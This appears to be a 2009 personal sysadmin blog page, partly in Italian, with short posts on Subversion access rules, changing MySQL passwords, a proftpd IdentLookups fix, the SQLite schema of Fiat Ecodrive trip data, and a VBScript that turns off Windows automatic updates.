# Grant alice and bob write access to all of /myproject1/.
#
[/myproject]
* = r
leo = rw
temp = rw

#
# Grant carol and charlie write access to only /myproject/foo
#
[/myproject/foo]
leo= rw
temp = rw

Mar 22, 2009 at 11:44 pm 0

MySQL Change Password

If you have never set a root password for mysql, the server does not require a password at all for connecting as root. To setup root password for first time, use mysqladmin command at shell prompt as follows:

# mysqladmin -u root password NEWPASSWORD

However, if you want to change (or update) a root password, then you need to use following command

# mysqladmin -u root -p oldpassword newpass

Enter password:
Change MySQL password for other user
To change a normal user password you need to type (let us assume you would like to change password for leo):

# mysqladmin -u leo -p oldpassword newpass

Changing mysql root user password using mysql sql command
This is another method. mysql stores username and passwords in user table inside mysql database. You can directly update password using the following method to update or change password for user leo:

1. Login to mysql server, type following command at shell prompt:

# mysql -u root -p

2. Use mysql database (type command at mysql> prompt):

mysql> use mysql;

3. Change password for user leo:

mysql> update user set password=PASSWORD(“NEWPASSWORD”) where User=’leo’;

4. Reload privileges:

mysql> flush privileges;
mysql> quit

Mar 17, 2009 at 10:20 pm 0

ProFTP(D) – Ident Lookups

Visto che mi è capitato e mi dimentico sempre, proftpd nell’installazione standard (Debian per capirci) è attivo di defaultl l’ident del client, quindi colpa del reverse o colpa dei dns mal configurati la connessione risulta parecchio lenta nella fase di autenticazione.

Per risolvere:

#/etc/proftpd/proftpd.conf
IdentLookups no

Mar 15, 2009 at 11:32 pm 10

Fiat Ecodrive – Database

E così ho comprato una 500, come per le macchine di nuova produzione della Fiat a bordo hanno equipaggiato un sistema che si chiama Blue & Me un computer di bordo basato su Windows Mobile for Automotive, che tuttosommato non è neanche una scelta così pessima quando funziona.

Questa breve introduzione mi era necessaria per descrivere un software fornito dalla Fiat chiamato Ecodrive installabile sul computer di bordo dell’automobile. Nonostante il nome non è nientaltro che un datalogger dei dati di bordo come velocità, numero di giri del motore, temperature ecc. che salva tutto su una drive collegato alla porta usb della macchina.

Di base nasce tutto come un supporto alla guida che aiuti a migliorare lo stile al fine di ridurre i consumi..
Inutile dire che fa abbastanza ridere questa cosa come anche l’interfaccia grafica del software che lo rendo un giocattolo.

A questo punto dati + software indecente, nasce spontaneo eliminare una delle due cose e correre ai ripari.

I dati grezzi vengono salvati nel drive usb in /iFiat/ecoDrive/data/
in un file chiamato eddrm.-idnumericoauto-.bin
da lazyman non ho ancora trovato il significato di questo file quindi consiglio di passare allo step successivo che offre i dati già pronti.

Il software Ecodrive fornito è un’applicativo scritto in Adobe AIR ad occhio può sembrare una scelta di dubbia convenienza ma sul sito fiat ho avuto una grande sorpresa il download era disponibile anche per Mac OS X.
Ovviamente non sto a descrivere come installare e usare il programma quindi do per scontato che sia già stata fatta la prima importazione dei dati.

I dati sono stoccati sulla macchina locale in quattro file SQLite in una directory simile a questa:

/Users/username/Library/Preferences/com.fiat.convergence.-idnumerico-.1/Local Store/

ecoDrive.db (Questo file contiene di dati varibili del software come costo carburante e simili aggiornati automaticamente da internet)
ecoDriveCommunity.db (Questo file contiene i dati statistici della comunity usati per fare in confronto con i trend locali)
ecoDriveJourney.db (Questo file contiene i dati devi viaggi effettuati dai veicoli)
iFiat.db (Questo file contiene le configu razioni base del programma e veicoli)

I file si possono aprire con qualsiasi cosa supporti SQLite ad esempio io uso SQLite Database Browser per Mac OS X:
A noi serve il seguente file ecoDriveJourney.db in seguito illustro lo schema per tabelle:

Table: AccellerationBandData
Field: JourneyId (integer PRIMARY) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: LowerSpeed (integer PRIMARY) valore numerico che esprime la velocità minima in km/h
Field: UpperSpeed (integer PRIMARY) valore numerico che esprime la velocità massima in km/h
Field: Acceleration (FLOAT) valore numerico positivo che esprime l’accellerazione in “g” per essere più chiari m/s2
Field: Deceleration (FLOAT) valore numerico negativo che esprime l’accellerazione in “g” per essere più chiari m/s2
Table: DatabaseVersion (questa tabella non contiene dati utili)

Table: DrivingCategoryScore
Field: JourneyId (integer PRIMARY) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: JourneyCategoryId
Field: Score

Table: GearData
Field: JourneyId (integer PRIMARY) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: Gear (integer PRIMARY) id numerico che indica la marcia 0 indica la retro
Field: AverageAcceleration (FLOAT) valore numerico positivo che esprime l’accellerazione in “g” per essere più chiari m/s2 per la singola marcia
Field: AverageDownshiftRPM (FLOAT) valore numerico che indica gli RPM minimi raggiunti con la marcia inserita
Field: AverageUpshiftRPM (FLOAT) valore numerico che indica gli RPM massimi raggiunti con la marcia inserita
Field: PercentUsage (FLOAT) sono ancora indeciso su questo dato non riesco ad interpretare i decimali
Field: AverageDeceleration (FLOAT) valore numerico negativo che esprime l’accellerazione in “g” per essere più chiari m/s2

Table: Journey
Field: Id (integer PRIMARY) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: UserLocalId identificativo interno dell’autista
Field: VehicleLocalId identificativo interno del veicolo
Field: StartTime ora di inizione del viaggio espresso in unixtimestamp
Field: StartDate data di inizione del viaggio espresso in unixtimestamp
Field: EndTime ora fine di fine del viaggio espresso in unixtimestamp
Field: StartOdometer kilometri indicati dal tachimetro al momento di inizio del viaggio
Field: StopOdometer kilometri indicati dal tachimetro all fine del viaggio
Field: EcoIndex paramentro dell’ecodrive
Field: EcoIndexServerId paramentro dell’ecodrive
Field: EcoIndexServerAlgorithmVersion paramentro dell’ecodrive
Field: PricePerUnit costo del carburante
Field: FuelConsumed carburante usato
Field: JourneyType tipo di viaggio urbato/extraurbano viene calcolato in base a velocità massima e distanza, dato non reale
Field: ComputedServerFuelConsumption carburante usato
Field: ConsumptionUnit unità in cui è espresso il consumo
Field: TripDataCount ???

Table: TripAComputerData
Field: JourneyId (integer) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: DateTime cambo che indica data e ora in cui viene registrato il record espresso in unixtimestamp
Field: PartialOdometer inidica in kilometri quanto indica il tachimetro parziale
Field: AverageSpeed velocità media espressa in km/h
Field: AverageFuelConsumption: valore che esprime il consumo medio in litri per 100Km
Field: EventType tipo di viaggio urbano/extraurbano
Field: DistanceUnit indica con che unità sono espresse le distanze.

Table: TripData
Field: JourneyId (integer) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: DateTime cambo che indica data e ora in cui viene registrato il record espresso in unixtimestamp
Field: EngineSpeed RPM del motore
Field: VehicleSpeed velocità veicolo in Km/h
Field: IstantaneosFuelConsumption valore che esprime il consumo medio in litri per 100Km
Field: AverageFuelConsumption valore che esprime il consumo medio in litri per 100Km

Table: TripStatusData
Field: JourneyId (integer) id numerico del viaggio generato ad ogni avvio e spegnimento del computer di bordo.
Field: DateTime cambo che indica data e ora in cui viene registrato il record espresso in unixtimestamp
Field: ExternalTemperature temperatura esterna espressa in gradi centigradi
Field: CompressorSts ???

Feb 12, 2009 at 1:20 am 0

Windows – Disable automatic update from VBS

Sono stufo di cliccare..

Const AU_DISABLED = 1

Set objAutoUpdate = CreateObject(“Microsoft.Update.AutoUpdate”)
Set objSettings = objAutoUpdate.Settings

objSettings.NotificationLevel = AU_DISABLED
objSettings.Save

Archives

Flickr Recent Photos

L1010837L1010836L1010835L1010834L1010833L1010832L1010831L1010830L1010829

Web Widgets